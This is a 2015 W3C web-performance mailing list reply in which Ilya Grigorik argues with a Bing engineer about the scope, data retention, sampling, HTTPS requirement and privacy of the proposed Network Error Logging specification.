Re: [navigation-error-logging] new draft proposal from Ilya Grigorik on 2015-01-13 (public-web-perf@w3.org from January 2015)

From: Ilya Grigorik <igrigorik@google.com>
Date: Tue, 13 Jan 2015 10:47:31 -0800
To: "Aaron Heady (BING AVAILABILITY)" <aheady@microsoft.com>
Cc: public-web-perf <public-web-perf@w3.org>, Domenic Denicola <domenic@google.com>
Message-ID: <CADXXVKoxHFxyxWM-__A=ZhNt2tmXS3yVdS8ycq8GJYgMNn10DA@mail.gmail.com>
On Tue, Jan 13, 2015 at 6:43 AM, Aaron Heady (BING AVAILABILITY) <
aheady@microsoft.com> wrote:

>  I’ll summarize with this system isn’t designed to detect full outages,
> we should see that in normal internal volume drop telemetry/alerts. And it
> isn’t designed to detect a single error, there will just be too much noise
> in the system for any one user or error to matter.
>

You can make the same argument about performance timing data, yet we
provide a complete view and defer how you interpret this data to particular
sites and applications.. which, I believe is the right approach: in some
cases a single user can matter; we should not assume that you already have
a telemetry system, nor that your system is able to distinguish errors from
regular daily dips (e.g. 1% of users on network X is having problem
accessing your site, that data would simply get lost in the noise of your
system today; if you don't care about this.. OK, but some sites do).


> Further, the use the of the .js API to send NEL info back to the telemetry
> origin is predicated on the well-established user behavior of
> refresh-on-failure. We’ve all done it, and will continue to do it. When a
> website fails, the vast majority of us shrug it off as ‘the internet’ and
> retry. If the site we’re accessing is having an intermittent issue, then
> we’ll get a page load eventually and we can then get the NEL entries.
> Remember, we don’t need every user to retry, just a sample of them to
> establish the change in rate of errors.
>

I disagree with this. You're focused on an intermittent error where an F5
delivers an immediate fix. There is another class of errors which we don't
have visibility into that this system enables: blocked access, attacks
against the user, network misconfiguration, etc.. a refresh cannot and does
not address that. That, plus you're assuming that your user will come back
some time later.. which may be true of a popular destination like Bing, but
not true of vast majority of long-tail sites: I click on a link, it's dead,
I click back and never come back -- no report is ever collected, the site
that failed remained oblivious.

Case in point and an example from my own incompetence:
https://github.com/igrigorik/istlsfastyet.com/pull/56
- I added AAAA records but did not configure my server to listen on the
ipv6 address
- TMo users were unable to reach istlsfastyet.com ... and *I had no idea
for year+*

You can't detect or resolve above case with JS reporting. As written, NEL
solves this.


>  As this system is designed to detect intermittent outages, say a buggy
> DNS deployment, then the information has a very short useful lifespan.
>

I don't see why you're assuming that we should restrict ourselves to
intermittent outages only -- we shouldn't. We have *no visibility* into
persistent misconfiguration / attacks / etc. outages and NEL can finally
help us detect and act on this.

I’d argue that the data is of little value after 24 hours, I could even say
> much shorter and still be happy with the system. If we can’t detect a
> change in the volume of errors in say 6 hours, then the error rate is
> probably just part of the background noise and nothing is going to detect
> it. Every issue that I’ve watched in Bing.com that I would want this system
> to help detect could have tolerated the data on clients being expired in
> just 5 minutes. The retry rate and the volume of users is what matters,
> nothing else.
>

That's a good data point - thanks. In 2.3 I did provide a "SHOULD" for
dropping reports after 24 hours.


>   For the real-time delivery part, ok, I get it. But I don’t like the
> idea of having millions of clients set to automatically flood me with
> telemetry when an issue occurs.
>

This is fair, for a large site you may want to sample. In DR we have a
"failure_sample_rate" setting in the config. I can see an argument
providing that as a configuration option: sample=0.1 .. deliver 10% of
error reports, or some such.


> What are some cases that everyone out there is thinking about detecting?
> In my mind it is all unstable code causing intermittent results/errors of
> some type. What are your thoughts.
>

Any network error that prevents the user from successfully loading the
resource: transient, permanent, attack, whatever. There is a *long* list of
reasons why a user may not be able to reach the site.. our job is to
deliver the telemetry of when such a failure occurs and leave it to the
operator to figure out how/if they want to act on it.


> But one specific concern wasn’t addressed: Secure policy delivery on
> HTTP-only networks. If example.com is hosted on a CDN’s http-only
> delivery network, it is literally not possible (by policy, not technology)
> to provision an SSL certificate on the same host. You can’t have HTTP and
> HTTPS resolve to two different IPs, so it won’t be possible to have TLS,
> thus this feature can’t be used. My biggest context for this is experience
> with Akamai, but it certainly can be generalized. Not arguing against TLS
> in general, just want to understand how NEL will be used in sites that
> can’t host a secure channel on the same hostname.
>

I can't comment about Akamai, but I'm sure they should have a solution for
this - if not, they should, or they'll be losing business! As I said
earlier, I think NEL falls into "powerful features" bucket and registration
needs to be managed over HTTPS.

We *have to* provide non-JS delivery to facilitate real-time + reliable
> reporting:
>
>   (a) pure JS solution cannot deliver real-time reports since, by
> definition, the navigation must have succeeded.. it only enables
> after-the-fact reporting.
>
> (b) after-the-fact reporting requires that the user comes back later and
> that load succeeds: this can happen with an arbitrary delay (users
> decision), or not at all - e.g. I click on a search result or link in some
> article, it fails to load, I never come back and report is never delivered.
>
> <<Aaron>>  How often do you hit refresh when page fails, that next load is
> the opportunity for this data, delayed by just seconds.
>

I do.. and sometimes it works, but sometimes it doesn't. The fact that
sometimes it doesn't is important, and we absolutely need to provide
visibility into this case.


>  (c) any script (including third party) can iterate over your navigation
> error logs.. which exposes additional private data about the user+their
> network without (in my opinion) adding much value due to all of the reasons
> above.
>
>   <<Aaron>> This one is interesting. How is this issue different for any
> of the other arrays of info, navigation timing? Let’s pick this one apart.
>

You're right, it's not new. I'm just highlighting the pitfalls of exposing
the JS API.

ig
Received on Tuesday, 13 January 2015 18:48:38 UTC